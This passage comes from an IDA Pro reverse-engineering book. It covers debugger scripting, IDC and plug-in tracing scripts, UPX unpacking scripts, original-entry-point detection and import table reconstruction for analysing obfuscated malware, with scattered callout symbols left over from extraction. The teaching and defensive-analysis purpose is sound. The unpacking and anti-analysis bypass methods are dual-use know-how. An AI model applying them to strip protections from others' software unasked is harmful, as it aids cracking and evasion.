GetDebuggerEvent(WFNE_CONT|WFNE_NOWAIT, 0).

534 Chapter 24

Additional functions are provided for automatically launching the

debugger and attaching to running processes. See IDA’s help file for more

information on these functions.

An example of a simple debugger script for collecting statistics on the

addresses of each executed instruction (provided the debugger is enabled)

is shown here:

static main() {

auto ca, code, addr, count, idx;

X ca = GetArrayId("stats");

if (ca != -1) {

DeleteArray(ca);

}

ca = CreateArray("stats");

Y EnableTracing(TRACE_STEP, 1);

Z for (code = GetDebuggerEvent(WFNE_ANY | WFNE_CONT, -1); code > 0;

code = GetDebuggerEvent(WFNE_ANY | WFNE_CONT, -1)) {

[ addr = GetEventEa();

\ count = GetArrayElement(AR_LONG, ca, addr) + 1;

] SetArrayLong(ca, addr, count);

}

EnableTracing(TRACE_STEP, 0);

^ for (idx = GetFirstIndex(AR_LONG, ca);

idx != BADADDR;

idx = GetNextIndex(AR_LONG, ca, idx)) {

count = GetArrayElement(AR_LONG, ca, idx);

Message("%x: %d\n", idx, count);

}

_ DeleteArray(ca);

}

The script begins X by testing for the presence of a global array named

stats. If one is found, the array is removed and re-created so that we can start

with an empty array. Next Y, single-step tracing is enabled before entering a

loop Z to drive the single-stepping process. Each time a debug event is gen-

erated, the address of the associated event is retrieved [, the current count

for the associated address is retrieved from the global array and incremented

\, and the array is updated with the new count ]. Note that the instruction

pointer is used as the index into the sparse global array, which saves time look-

ing up the address in some other form of data structure. Once the process

completes, a second loop ^ is used to retrieve and print all values from array

locations that have valid values. In this case, the only array indexes that will

have valid values represent addresses from which instructions were fetched.

The script finishes off _ by deleting the global array that was used to gather

the statistics. Example output from this script is shown here:

401028: 1

40102b: 1

40102e: 2

The IDA Debugger 535

401031: 2

401034: 2

401036: 1

40103b: 1

A slight alteration of the preceding example can be used to gather statis-

tics on what types of instructions are executed during the lifetime of a pro-

cess. The following example shows the modifications required in the first

loop to gather instruction-type data rather than address data:

for (code = GetDebuggerEvent(WFNE_ANY | WFNE_CONT, -1); code > 0;

code = GetDebuggerEvent(WFNE_ANY | WFNE_CONT, -1)) {

addr = GetEventEa();

X mnem = GetMnem(addr);

Y count = GetHashLong(ht, mnem) + 1;

Z SetHashLong(ht, mnem, count);

}

Rather than attempting to classify individual opcodes, we choose to

group instructions by mnemonics X. Because mnemonics are strings, we

make use of the hash-table feature of global arrays to retrieve the current

count associated with a given mnemonic Y and save the updated count Z

back into the correct hash table entry. Sample output from this modified

script is shown here:

add: 18

and: 2

call: 46

cmp: 16

dec: 1

imul: 2

jge: 2

jmp: 5

jnz: 7

js: 1

jz: 5

lea: 4

mov: 56

pop: 25

push: 59

retn: 19

sar: 2

setnz: 3

test: 3

xor: 7

In Chapter 25 we will revisit the use of debugger-interaction capabilities

as a means to assist in de-obfuscating binaries.

536 Chapter 24

Automating Debugger Actions with IDA Plug-ins

In Chapter 16 you learned that IDA’s SDK offers significant power for devel-

oping a variety of compiled extensions that can be integrated into IDA and

that have complete access to the IDA API. The IDA API offers a superset of

all the capabilities available in IDC, and the debugging extensions are no

exception. Debugger extensions to the API are declared in <SDKDIR>/

dbg.hpp and include C++ counterparts to all of the IDC functions discussed

thus far, along with a complete asynchronous debugger interface capability.

For asynchronous interaction, plug-ins gain access to debugger notifica-

tions by hooking the HT_DBG notification type (see loader.hpp). Debugger noti-

fications are declared in the dbg_notification_t enum found in dbg.hpp.

Within the debugger API, commands for interacting with the debugger

are typically defined in pairs, with one function used for synchronous inter-

action (as with scripts) and the second function used for asynchronous inter-

action. Generically, the synchronous form of a function is named COMMAND(),

and its asynchronous counterpart is named request_COMMAND(). The request_XXX

versions are used to queue debugger actions for later processing. Once you

finish queuing asynchronous requests, you must invoke the run_requests func-

tion to initiate processing of your request queue. As your requests are pro-

cessed, debugger notifications will be delivered to any callback functions that

you may have registered via hook_to_notification_point.

Using asynchronous notifications, we can develop an asynchronous ver-

sion of the address-counting script from the previous section. The first task is

to make sure that we hook and unhook debugger notifications. We will do

this in the plug-in’s init and term methods, as shown here:

//A netnode to gather stats into

X netnode stats("$ stats", 0, true);

int idaapi init(void) {

hook_to_notification_point(HT_DBG, dbg_hook, NULL);

return PLUGIN_KEEP;

}

void idaapi term(void) {

unhook_from_notification_point(HT_DBG, dbg_hook, NULL);

}

Note that we have also elected to declare a global netnode X, which we

will use to collect statistics. Next we consider what we want the plug-in to do

when it is activated via its assigned hotkey. Our example plug-in run function

is shown here:

void idaapi run(int arg) {

stats.altdel(); //clear any existing stats

X request_enable_step_trace();

Y request_step_until_ret();

Z run_requests();

}

The IDA Debugger 537

Since we are using asynchronous techniques in this example, we must

first submit a request to enable step tracing X and then submit a request to

resume execution of the process being debugged. For the sake of simplicity,

we will gather statistics on the current function only, so we will issue a request

to run until the current function returns Y. With our requests properly

queued, we kick things off by invoking run_requests to process the current

request queue Z.

All that remains is to process the notifications that we expect to receive

by creating our HT_DBG callback function. A simple callback that processes

only two messages is shown here:

int idaapi dbg_hook(void *user_data, int notification_code, va_list va) {

switch (notification_code) {

X case dbg_trace: //notification arguments are detailed in dbg.hpp

va_arg(va, thid_t);

Y ea_t ea = va_arg(va, ea_t);

//increment the count for this address

Z stats.altset(ea, stats.altval(ea) + 1);

return 0;

[ case dbg_step_until_ret:

//print results

\ for (nodeidx_t i = stats.alt1st(); i != BADNODE; i = stats.altnxt(i)) {

msg("%x: %d\n", i, stats.altval(i));

}

//delete the netnode and stop tracing

] stats.kill();

^ request_disable_step_trace();

_ run_requests();

break;

}

The dbg_trace notification X will be received for each instruction that

executes until we turn tracing off. When a trace notification is received, the

address of the trace point is retrieved from the args list Y and then used to

update the appropriate netnode array index Z. The dbg_step_until_ret notifi-

cation [ is sent once the process hits the return statement to leave the func-

tion in which we started. This notification is our signal that we should stop

tracing and print any statistics we have gathered. A loop is used \ to iterate

through all valid index values of the stats netnode before destroying the net-

node ] and requesting that step tracing be disabled ^. Since this example

uses asynchronous commands, the request to disable tracing is added to the

queue, which means we have to issue run_requests _ in order for the queue to

be processed. An important warning about synchronous versus asynchronous

interaction with the debugger is that you should never call the synchronous

version of a function while actively processing an asynchronous notification

message.

Synchronous interaction with the debugger using the SDK is done in

a manner very similar to scripting the debugger. As with many of the SDK

functions we have seen in previous chapters, the names of debugger-related

538 Chapter 24

functions typically do not match the names of related scripting functions, so

you may need to spend some time combing through dbg.hpp in order to find

the functions you are looking for. The biggest disparity in names between

scripting and the SDK is the SDK’s version of GetDebuggerEvent, which is called

wait_for_next_event in the SDK. The other major difference between script

functions and the SDK is that variables corresponding to the CPU registers

are not automatically declared for you within the SDK. In order to access the

values of CPU registers from the SDK, you must use the get_reg_val and

set_reg_val functions to read and write registers, respectively.

Summary

IDA may not have the largest share of the debugger market, but its debugger

is powerful and integrates seamlessly with the disassembly side of IDA. While

the debugger’s user interface, like that of any debugger, requires some initial

getting used to, it offers all of the fundamental features that users require in a

basic debugger. Strong points include scripting and plug-in capabilities along

with the familiar user interface of IDA’s disassembly displays and the power of

its analysis capabilities. Together the unified disassembler/debugger combi-

nation provides a solid tool for performing static analysis, dynamic analysis,

or a combination of both.

JMP

EBP

SUB

DISASSEMBLER/DEBUGGER

INTEGRATION

An integrated disassembler/debugger

combination such as IDA should be a pretty

powerful tool for manipulating binaries and

seamlessly applying static and dynamic techniques as

part of the reverse engineering process. This turns out

to be true if you understand the capabilities and limita-

tions of each tool individually and in combination.

In this chapter we will discuss some important points concerning the

manner in which the static side of IDA interacts with its dynamic side, and

we will take a look at techniques that can be employed with IDA’s debugger

in order to defeat certain anti-debugging (and anti-disassembly) techniques

in the context of malware analysis. In that regard, it is important to remem-

ber that the goal in malware analysis is usually not to run the malware but to

obtain a disassembly of sufficient quality to allow static analysis tools to take

over. Recall from Chapter 21 that there are many techniques designed specif-

ically to prevent disassemblers from performing properly. In the face of such

540 Chapter 25

anti-disassembly techniques, the debugger is simply one means to an end. By

running an obfuscated program under debugger control, we will attempt to

obtain a de-obfuscated version of the program, which we then prefer to ana-

lyze using the disassembler.

Background

Some background on debugger-assisted de-obfuscation may be useful before

proceeding. It is well known that an obfuscated program must de-obfuscate

itself before it can get down to its intended business. The following steps pro-

vide a basic and somewhat simplistic guide for dynamic de-obfuscation of

binaries.

1. Open an obfuscated program with a debugger.

2. Search for and set a breakpoint on the end of the de-obfuscation routine.

3. Launch the program from the debugger and wait for your breakpoint to

trigger.

4. Utilize the debugger’s memory-dumping features to capture the current

state of the process to a file.

5. Terminate the process before it can do anything malicious.

6. Perform static analysis on the captured process image.

Most modern debuggers contain enough features to perform the tasks

just mentioned. OllyDbg1 is a very popular Windows-only debugger often

used for such work. Step 2 is not always as straightforward as it may sound.

It may take a combination of tools, including spending some amount of time

in a disassembler such as IDA, or a lot of single stepping before the end of

the de-obfuscation algorithm can be properly identified. In many cases, the

end of de-obfuscation is marked by a behavior rather than a specific instruc-

tion. One such behavior might be a large change in the instruction pointer

value, indicating a jump to a location far from the de-obfuscation code. In

the case of UPX-packed binaries, for example, all you need to do is observe

that the instruction pointer holds a value that is less than the program’s entry

point address to know that de-obfuscation is complete and the program has

jumped to the newly de-obfuscated code. In generic terms, this process is

called original entry point (OEP) recognition, the OEP being the address at which

the program would have begun execution had it not been obfuscated.

Complicating matters, some modern obfuscators are capable of trans-

forming an input executable into an equivalent byte code program, which

is then executed on a custom virtual machine generated by the obfuscator.2

Executables protected with such virtualizing obfuscators cannot be analyzed

with the traditional expectation of recovering the original binary or locating

1. See http://www.ollydbg.de/.

2. For a discussion of one such obfuscator, VMProtect, see “Unpacking Virtualization

Obfuscators” by Rolf Rooles at http://www.usenix.org/event/woot09/tech/full_papers/rolles.pdf.

Disassembler/Debugger Integration 541

the original entry point. This is a result of the fact that the original x86 (or

other processor) instructions are not embedded in the obfuscated binary

and are therefore unavailable for recovery.

If you are not careful, step 3 can be a dangerous one. In any case,

you should always think twice before you allow a piece of malware to run

unhindered in the hope that you have set your breakpoints or breakpoint

conditions properly. If the program manages to bypass your breakpoint(s),

it may well proceed to execute malicious code before you know what has

happened. For this reason, attempts to de-obfuscate malware under debug-

ger control should always be conducted in a sandbox environment that you

are not afraid to wipe clean in the event things go wrong.

Step 4 may require some level of effort, because memory dumping is usu-

ally supported in debuggers, while entire-process image dumping may not

be. The OllyDump3 plug-in, by Gigapede, adds process-dumping capabilities

to OllyDbg. Keep in mind that the image that gets dumped from memory

contains content from a running process and does not necessarily reflect the

original state of the binary at rest in a disk file. In malware analysis, however,

the goal is generally to create not a working de-obfuscated executable file,

but rather an image file that is correctly structured so that it can be loaded

into a disassembler for further analysis.

One of the trickiest parts of reconstructing a binary image from an

obfuscated process is restoration of the program’s imported function table.

As part of the obfuscation process, a program’s import table is often obfus-

cated as well. As a result, the de-obfuscation process must also take care of

linking the newly de-obfuscated process to all of the shared libraries and

functions the process requires in order to execute properly. The only trace

of this process is usually a table of imported function addresses somewhere

within the process’s memory image. When dumping a de-obfuscated process

image to a file, steps are often taken to attempt to reconstruct a valid import

table in the dumped process image. In order to do this, the headers of the

dumped image need to be modified to point to a new import table structure

that must properly reflect all of the shared library dependencies of the origi-

nal de-obfuscated program. A popular tool for automating this process is the

ImpREC4 (Import REConstruction) utility by MackT. As with process dump-

ing, keep in mind that extracting a standalone executable may not be your

primary goal in malware analysis, in which case reconstructing valid headers

and a working import table is less important than knowing which functions

have been resolved and where the addresses of those functions have been

stored.

IDA Databases and the IDA Debugger

It is important that we begin with an understanding of how the debugger

treats your database when you initiate (and terminate) a debugging session.

A debugger needs a process image to work with. Debuggers obtain process

3. See http://www.woodmann.com/collaborative/tools/index.php/OllyDump.

4. See http://www.woodmann.com/collaborative/tools/index.php/ImpREC.

542 Chapter 25

images either by attaching to existing processes or by creating new processes

from executable files. An IDA database does not contain a valid process image,

nor in most cases can a valid process image be reconstructed from a database

(if one could, then FileProduce FileCreate EXE File might be simple to

implement). When you launch a debugger session from IDA, the disassem-

bler side informs the debugger side of the name of the original input file,

which the debugger uses to create and attach to a new process. Information

provided to the debugger includes disassembly formatting, symbol names,

data formatting, and any comments that you have entered into the database.

An important point to understand is that any patches (changes in byte con-

tent) you have applied to your database will not be reflected in the process

being debugged. In other words, it is not possible to patch changes into the

database and expect to observe the effect of those changes when you launch

the debugger.

The opposite holds true as well. When you have finished debugging a

process and you return to disassembly mode, by default the only changes that

will be reflected in the database are cosmetic in nature (such as renamed

variables or functions). Any memory changes, such as self-modified code, are

not pulled back into the database for you to analyze. If you wish to migrate

any content, such as newly de-obfuscated code, from the debugger back to

your disassembly database, IDA will allow you to do so via the Debugger

Take Memory Snapshot command. The resulting confirmation dialog is

shown in Figure 25-1.

Figure 25-1: Memory snapshot confirmation dialog

The default option is to copy loader segments from the running process

to the database. Loader segments are those segments that were loaded into the

database by the IDA loader module used to create the current database. In

the case of an obfuscated program, one or more of these segments probably

contain data that has been obfuscated and are therefore nearly impossible to

analyze in the disassembler. These are precisely the segments that you will

want to copy back from the running process image in order to take advan-

tage of the de-obfuscation work performed by the process running under

debugger control.

Selecting All segments causes all segments created by the debugger to

be copied back to the database. These segments include the contents of all

shared libraries loaded in support of the process as well as additional process-

related segments, such as the stack and heap contents.

When the debugger is used to attach to an existing process with no asso-

ciated database, none of the debugger segments will be flagged as loader seg-

ments because the file was not loaded by one of IDA’s loaders. In such cases,

Disassembler/Debugger Integration 543

you may elect to capture all available segments into a new database. Alterna-

tively, you may elect to edit segment attributes and designate one or more

segments as loader segments. Segment attributes may be edited by first open-

ing the Segments window (ViewOpen SubviewsSegments). Any segment

marked as a loader segment will contain an L in the L column of the Pro-

gram Segmentation window. Right-clicking a segment of interest and select-

ing Edit Segment opens the segment attributes dialog shown in Figure 25-2.

Figure 25-2: Segment editing

dialog with the Loader segment

checkbox

Selecting the Loader segment checkbox marks the segment as a loader

segment and allows it to be copied into the database along with all other

loader segments.

The segment attributes dialog is also useful when you have created a pro-

cess from an open database and wish to add additional loader segments before

taking a memory snapshot. For example, if an obfuscated process extracts

the original code into a block of memory allocated in the heap (or a memory-

mapped block), you will want to mark that memory block as a loader seg-

ment before you snapshot memory; otherwise, the de-obfuscated code will

not be copied back into your database.

Debugging Obfuscated Code

We have mentioned a number of times that loading an obfuscated program

in a debugger, allowing it to run until the de-obfuscation is complete, and

then taking a memory snapshot of the program in its de-obfuscated state

seems like a good strategy for obtaining a de-obfuscated version of a pro-

gram. Controlled execution is probably a better way of thinking about this

process than debugging, because all we are really doing is observing the

code in operation and then taking a memory snapshot at the appropriate

544 Chapter 25

moment. A debugger simply happens to be the tool that allows us to accom-

plish this task. At least that is what we are hoping for. In Chapter 21 we dis-

cussed several anti-disassembly and anti-debugging techniques that obfuscators

utilize in an attempt to prevent us from obtaining a clear picture of a pro-

gram. It is time to see how IDA’s debugger can help us bypass some of these

techniques.

For this chapter we will assume that the obfuscated programs we are

dealing with employ some form of encryption or compression on the inter-

esting portions of the binary. The level of difficulty in obtaining a clear pic-

ture of that code depends entirely on the sophistication of any anti-analysis

techniques used in the obfuscation process and the measures that can be

developed to circumvent these techniques. Before we get started, however,

here are a few rules to live by when working with malware in a debugging

environment:

1. Protect your network and host environments. Always work in a sandbox

environment.

2. On initial analysis, use single stepping when possible. It may be tedious,

but it is your best defense against a program escaping your control.

3. Always think twice before executing a debugger command that will allow

more than a single instruction to execute. If you have not planned prop-

erly, the program you are debugging may run into a malicious portion of

the code.

4. When possible, use hardware breakpoints. It is difficult to set software

breakpoints in obfuscated code, because de-obfuscation algorithms may

modify the breakpoint instructions that you have inserted or compute

checksums over regions of code.5

5. When examining a program for the first time, it is best to allow the debug-

ger to handle all exceptions generated by the program so that you can

make informed decisions about which exceptions to pass to the program

and which exceptions the debugger should continue to catch.

6. Be prepared to restart debugging often, because one wrong step can

lead you down a road to failure (for example, if you allow the process

to detect the debugger). Keep detailed notes regarding addresses that

are safe to run to so that you can rapidly recover when you restart the

process.

In general, you should always take a very cautious approach the first time

you start to work with a particular obfuscated program. In most cases your

primary goal should be to obtain a de-obfuscated version of the program.

Speeding up the de-obfuscation process by learning exactly how far you can

go before you need to set a breakpoint should be a secondary goal, and it is

probably best saved for a follow-on exercise once you have managed to suc-

cessfully de-obfuscate a program for the first time.

5. Keep in mind that the software breakpoint instruction inserted by the debugger will cause the

checksum computation to yield a result other than the expected result.

Disassembler/Debugger Integration 545

Launching the Process

Whether you have spent minutes or hours studying a malicious executable

with IDA, you will probably want to gain control of it at the earliest opportu-

nity the first time you launch it in the debugger. One of the easiest ways to

gain control over a process is to set a breakpoint at the process entry point,

the first instruction executed once the operation has finished creating the

process’s memory image. In most cases this will be the symbol labeled start;

however, in some cases it won’t. The PE file format, for example, allows for

the designation TLS6 callback functions designed to perform initialization

and destruction tasks for data that is local to each thread, and these TLS call-

back functions are invoked before control is ever transferred to start.

Malware authors are well aware of TLS callback functions and have made

use of these functions to have code executed before a program’s main entry

point code gets a chance to run. The hope is that anyone analyzing the mal-

ware will fail to notice the presence of the TLS callback, with a resulting fail-

ure to understand the true behavior of the program being analyzed. IDA

properly parses PE file headers and recognizes the presence of any TLS call-

backs contained within a PE file, adding any such functions to the binary’s

list of entry points in the Exports window. Figure 25-3 shows the Exports win-

dow for an executable that contains a TLS callback.

Figure 25-3: Exports window showing a TLS callback function

The bottom line when it comes to TLS callbacks is to recognize their

presence and then set breakpoints at the beginning of each TLS callback

function to ensure that you gain control of the process before it is too late.

Many debuggers offer options to specify when (if at all) the debugger

should pause following initial process creation, and IDA is no exception.

Figure 25-4 shows a portion of IDA’s Debugger Setup dialog (Debugger

Debugger Options).

Figure 25-4: Debugger pausing events

6. For more information on Thread Local Storage (TLS) callback functions, please refer to the

PE file format specification http://msdn.microsoft.com/en-us/windows/hardware/gg463119.aspx.

546 Chapter 25

Each of the available options offers the opportunity to automatically pause

the process being debugged when specific events occur. Each of these events

is summarized in the following list:

Stop on debugging start This option offers the earliest opportunity to

pause the debugger following process creation. For example, on Windows

7, this will pause the process at the beginning of the RtlUserThreadStart

function within ntdll.dll. This will pause execution before any program

code, including TLS callback functions, is executed.

Stop on process entry point Causes the debugger to pause execution

once the program entry point is reached. This typically coincides with

the symbol named start (or its equivalent) in your IDA database. Any

TLS callback functions will already have executed before this event takes

place.

Stop on thread start/exit Pauses the debugger each time a new thread

starts or an existing thread terminates. On a Windows system, when this

event fires, the debugger will pause somewhere within kernel32.dll.

Stop on library load/unload Pauses the debugger each time a new

library is loaded or an existing library is unloaded. On a Windows sys-

tem, when this event fires, the debugger will pause somewhere within

kernel32.dll.

Stop on debugging message Pauses execution each time the process

outputs a message using the debug print facility. On Windows systems,

this corresponds to a call to OutputDebugString, and execution is paused

within kernel32.dll.

Understanding where the process is likely to be paused for each of these

debugger events is important in order to keep the process you are debugging

from executing further than you intend it to. Once you are certain that you

will gain control of the process in a predictable manner, you can move on to

getting some work done with the debugger.

Simple Decryption and Decompression Loops

When we say simple decryption and decompression loops, we mean loops that

employ no nested obfuscation techniques and for which you can identify,

with certainty, all possible exit points. When you encounter such loops, the

easiest way to get through them is to set a breakpoint at all possible exit points

and then allow the loop to execute. Consider single stepping through such

loops one or two times in order to get a feel for them; then set breakpoints

accordingly. When setting a breakpoint immediately following a loop, you

should make sure that the bytes at the address at which you are setting the

breakpoint will not be changed during the course of the loop; otherwise,

a software breakpoint may fail to trigger. When in doubt, use a hardware

breakpoint.

If your goal is to develop a fully automated de-obfuscation process, you

will need to develop an algorithm for recognizing when the de-obfuscation

Disassembler/Debugger Integration 547

process has completed. When this condition is satisfied, your automated

solution can pause the process, at which point you can acquire a memory

snapshot. For simple de-obfuscation routines, recognizing the end of the

deobfuscation stage may be as simple as noting a large change in the value

of the instruction pointer or the execution of a specific instruction. For

example, the beginning and end of the UPX decompression routine for an

obfuscated Windows executable are shown in the following listing:

UPX1:00410370 start proc near

X UPX1:00410370 pusha

UPX1:00410371 mov esi, offset off_40A000

UPX1:00410376 lea edi, [esi-9000h]

UPX1:0041037C push edi

...

UPX1:004104EC pop eax

Y UPX1:004104ED popa ; opcode 0x53

UPX1:004104EE lea eax, [esp-80h]

UPX1:004104F2

UPX1:004104F2 loc_4104F2: ; CODE XREF: start+186Èj

UPX1:004104F2 push 0

UPX1:004104F4 cmp esp, eax

UPX1:004104F6 jnz short loc_4104F2

UPX1:004104F8 sub esp, 0FFFFFF80h

Z UPX1:004104FB jmp loc_40134C

Several characteristics of this routine can be used to automatically recog-

nize its completion. First, the routine begins by pushing all registers onto the

stack at the program entry point X. The complementary operation of popping

all registers occurs near the end of the routine Y after the program has been

decompressed. Finally, control is transferred Z to the newly unpacked pro-

gram. Thus, one strategy for automating decompression would be to step trace

the program until the current instruction is a popa. Because step tracing is

slow, the IDC script shown in Listing 25-1 takes the slightly different approach

of scanning for the popa instruction and then running the program to the

address of the popa:

#include <idc.idc>

#define POPA 0x53

static main() {

auto addr, seg;

addr = BeginEA(); //Obtain the entry point address

seg = SegName(addr);

Y while (addr != BADADDR && SegName(addr) == seg) {

Z if (Byte(addr) == POPA) {

[ RunTo(addr);

GetDebuggerEvent(WFNE_SUSP, -1);

Warning("Program is unpacked!");

\ TakeMemorySnapshot(1);

return;

548 Chapter 25

}

X addr = FindCode(addr, SEARCH_NEXT | SEARCH_DOWN);

}

Warning("Failed to locate popa!");

}

Listing 25-1: Simple UPX unpacker script

The script in Listing 25-1 is designed to be launched within an IDA data-

base, prior to launching the debugger, and assumes that you have previously

selected a debugger using DebuggerSelect debugger. The script takes care

of the details of launching the debugger and gaining control of the newly

created process. This script relies on some very specific features of UPX and

is therefore not a good candidate for use as a generic de-obfuscation script.

It does, however, demonstrate some concepts that might be used in later

efforts. The script depends on the fact that the decompression routine

resides at the end of one of the program segments (typically named UPX1)

and that UPX does not make use of any desynchronization techniques to pre-

vent proper disassembly.

The script relies on these facts in order to scan forward, one instruction

at a time X, from the program entry point, as long as the next instruction lies

within the same program segment Y and until the current instruction is a

popa Z. Once the popa instruction is located, the debugger is invoked [ to

execute the process up to the address of the popa instruction, at which point

the program has been decompressed. The last step is to take a memory snap-

shot \ to pull the de-obfuscated program bytes back into our database for

further analysis.

An even more general-purpose solution for automated unpacking is to

exploit the fact that many de-obfuscation routines are appended to the end

of a binary and perform a jump to the original entry point, which occurs

much earlier in the binary, once de-obfuscation is complete. In some cases,

the original entry point may lie in an entirely different program segment,

while in other cases, the original entry point simply precedes any address

OBFUSCATING OBFUSCATORS

UPX is one of the more popular obfuscation utilities in use today (perhaps because

it is free). Its popularity does not make it a particularly effective tool, however. One

of the principal drawbacks to its effectiveness is the fact that UPX itself offers a com-

mand-line option to restore a UPX-packed binary to its original form. Consequently,

a cottage industry has evolved for developing tools to prevent UPX from unpacking

itself. Because UPX performs some integrity checks on a compressed binary before it

will unpack that binary, simple changes that cause the integrity checks to fail without

affecting the operation of the compressed binary render UPX’s own unpacking feature

inoperative. One such technique involves changing the default UPX section names to

anything other than UPX0, UPX1, and UPX2. For this reason, it is useful to avoid hard-

coding these segment names into any scripts that you develop for unpacking UPX.

Disassembler/Debugger Integration 549

used by the de-obfuscation code. The Python script in Listing 25-2 offers

a more basic means of running a simple de-obfuscation algorithm until it

jumps to the program’s original entry point:

start = BeginEA()

XRunTo(start)

GetDebuggerEvent(WFNE_SUSP, -1)

YEnableTracing(TRACE_STEP, 1)

code = GetDebuggerEvent(WFNE_ANY | WFNE_CONT, -1)

while code > 0:

Z if GetEventEa() < start: break

code = GetDebuggerEvent(WFNE_ANY | WFNE_CONT, -1)

[PauseProcess()

GetDebuggerEvent(WFNE_SUSP, -1)

\EnableTracing(TRACE_STEP, 0)

]MakeCode(GetEventEa())

TakeMemorySnapshot(1)

Listing 25-2: Generic attempt to run until OEP is hit

Similar to the script in Listing 25-1, this script should be launched from

the disassembler rather than the debugger and again assumes that a debugger

has been selected. The script handles the details of launching the debugger

and gaining the necessary control of the newly created process. This particu-

lar script makes two assumptions: that all code prior to the entry point is

obfuscated and that nothing malicious takes place prior to transferring control

to an address that precedes the entry point. The script begins by launching

the debugger and pausing at the program entry point X. Next, the program

enables step tracing Y and loops to test the address of each generated

event Z. Once the event address precedes the program entry point address,

deobfuscation is assumed to be complete, and the process is paused [ and

step tracing disabled \. Finally, for good measure, the script ensures that the

bytes at the current instruction pointer location are formatted as code ].

When stepping your way through obfuscated code, it is not uncommon

to encounter the warning shown in Figure 25-5.

Figure 25-5: Debugger instruction pointer warning

This warning indicates that the instruction pointer is pointing into an

item that IDA believed was data or that the instruction pointer is pointing

into the middle of a previously disassembled instruction. This warning is

frequently encountered when single stepping through code that utilizes

550 Chapter 25

disassembly desynchronization techniques. It is also often encountered when

a program jumps to a region that was once data and is now code, as happens

following the de-obfuscation of a program. Answering yes to the question

causes IDA to reformat the bytes in question as code, which should be the

proper thing to do since the instruction pointer indicates that this is the next

item to be fetched for execution.

Note that because of its use of step tracing, the script in Listing 25-2 will

be substantially slower than the script in Listing 25-1. However, for the price

of slower execution, we gain a couple of advantages. First, we are able to

specify a termination condition that is not tied to any one address. This is not

possible when using breakpoints alone. Second, this script is immune to any

attempts to desynchronize the disassembler because instruction boundaries

are determined purely based on runtime values of the instruction pointer

rather than static disassembly analysis. In its announcement introducing

scripted debugging features,7 Hex-Rays presents a far more robust script for

performing the tasks of a universal unpacker.

Import Table Reconstruction

Once a binary has been de-obfuscated, analysis of that binary can begin.

While we may never intend to execute the de-obfuscated program (in fact,

we cannot execute that program if a snapshot was pulled directly into an IDA

database), a program’s import table is almost always a valuable resource for

developing an understanding of the program’s behavior.

Under normal circumstances, IDA is able to parse a program’s import

table as part of the file-loading process upon initial database creation. Unfor-

tunately, in obfuscated programs, the only import table that IDA sees at load

time belongs to the de-obfuscation component of the program. This import

table typically contains a bare minimum of functions required to complete

the de-obfuscation process. The most sophisticated obfuscators may generate

empty import tables, in which case the de-obfuscation component must con-

tain all of the code necessary to load libraries and resolve necessary functions

on its own.

As for the binary that has been obfuscated, in most cases its import table

has been obfuscated as well and is reconstructed, in some form, as part of the

de-obfuscation process. The reconstruction process typically relies on newly

de-obfuscated data in order to perform its own library loading and function

address resolution. For Windows programs, this nearly always involves calls to

the LoadLibrary function combined with repeated calls to GetProcAddress to

resolve required function addresses.

More sophisticated import table reconstruction routines may utilize cus-

tom lookup functions in place of GetProcAddress in order to avoid triggering

any breakpoints set on GetProcAddress itself. Such routines may also substitute

the use of hash values in place of strings for identifying which function’s

address is being requested. In rare cases, import table reconstructors may go

so far as to bypass LoadLibrary as well, in which case the reconstruction rou-

tine must implement its own custom version of that function.

7. See http://www.hex-rays.com/idapro/scriptable.htm.

Disassembler/Debugger Integration 551

The net result of the import table reconstruction process is usually a

table of function addresses, none of which have much meaning in a static

analysis context. If we take a memory snapshot of a process, the best we are

likely to come up with is something like the following partial listing:

UPX1:0040A000 dword_40A000 dd 7C812F1Dh ; DATA XREF: start+1Èo

UPX1:0040A004 dword_40A004 dd 7C91043Dh ; DATA XREF: sub_403BF3+68Çr

UPX1:0040A004 ; sub_405F0B+2B4Çr ...

UPX1:0040A008 dd 7C812ADEh

UPX1:0040A00C dword_40A00C dd 7C9105D4h ; DATA XREF: sub_40621F+5DÇr

UPX1:0040A00C ; sub_4070E8+FÇr ...

UPX1:0040A010 dd 7C80ABC1h

UPX1:0040A014 dword_40A014 dd 7C901005h ; DATA XREF: sub_401564+34Çr

UPX1:0040A014 ; sub_4015A0+27Çr ...

This block of data depicts a number of 4-byte values, all in close proxim-

ity to one another and referenced from various locations with the program.

The problem is that these values, such as 7C812F1Dh, represent addresses of

library functions as they were mapped in the process we were debugging.

Within the code section of the program itself, we would see function calls

similar to the following:

UPX0:00403C5B Xcall ds:dword_40A004

UPX0:00403C61 test eax, eax

UPX0:00403C63 jnz short loc_403C7B

UPX0:00403C65 Zcall sub_40230F

UPX0:00403C6A mov esi, eax

UPX0:00403C6C Ycall ds:dword_40A058

Note that two of the function calls, X and Y refer to the contents of the

reconstructed import table, while a third function call Z refers to a function

whose body is present in the database. In an ideal world, each entry in the

reconstructed import table would be named after the function whose address

it contains.

This problem is best addressed before taking a memory snapshot of the

de-obfuscated process. As shown in the next listing, if we view the same mem-

ory range from within the debugger, we get an entirely different picture. Since

the debugger has access to the memory regions in which each referenced

function lies, the debugger is able to display addresses (such as 7C812F1Dh) as

their corresponding symbolic names (in this case kernel32_GetCommandLineA).

UPX1:0040A000 off_40A000 dd offset kernel32_GetCommandLineA ; DATA XREF:UPX0:loc_40128FÇr

UPX1:0040A000 ; start+1Èo

UPX1:0040A004 off_40A004 dd offset ntdll_RtlFreeHeap ; DATA XREF: UPX0:004011E4Çr

UPX1:0040A004 ; UPX0:0040120AÇr ...

UPX1:0040A008 off_40A008 dd offset kernel32_GetVersionExA ; DATA XREF: UPX0:004011D4Çr

UPX1:0040A00C dd offset ntdll_RtlAllocateHeap ; DATA XREF: UPX0:004011B3Çr

UPX1:0040A00C ; sub_405E98+DÇr ...

UPX1:0040A010 off_40A010 dd offset kernel32_GetProcessHeap ; DATA XREF: UPX0:004011AAÇr

552 Chapter 25

UPX1:0040A014 dd offset ntdll_RtlEnterCriticalSection ; DATA XREF: sub_401564+34Çr

UPX1:0040A014 ; sub_4015A0+27Çr ...

It is worth noting at this point that the debugger adopts a slightly differ-

ent naming scheme than we are accustomed to. The debugger prefixes all

functions exported from shared libraries with the name of the associated

library followed by an underscore. For example, the function GetCommandLineA

in kernel32.dll is assigned the name kernel32_GetCommandLineA. This ensures that

unique names are generated should two libraries export the same name.

We need to overcome two problems with the import table shown in the

preceding listing. First, in order for function calls to become more readable,

we need to name each entry in the import table according to the function it

references. If the entries are named properly, IDA will automatically display

function signatures from its type libraries. Naming each import table entry

is a relatively easy task as long as we have a name to assign. This leads to the

second problem: obtaining the proper name. One approach is to parse the

debugger-generated name, strip off the library name, and assign the remain-

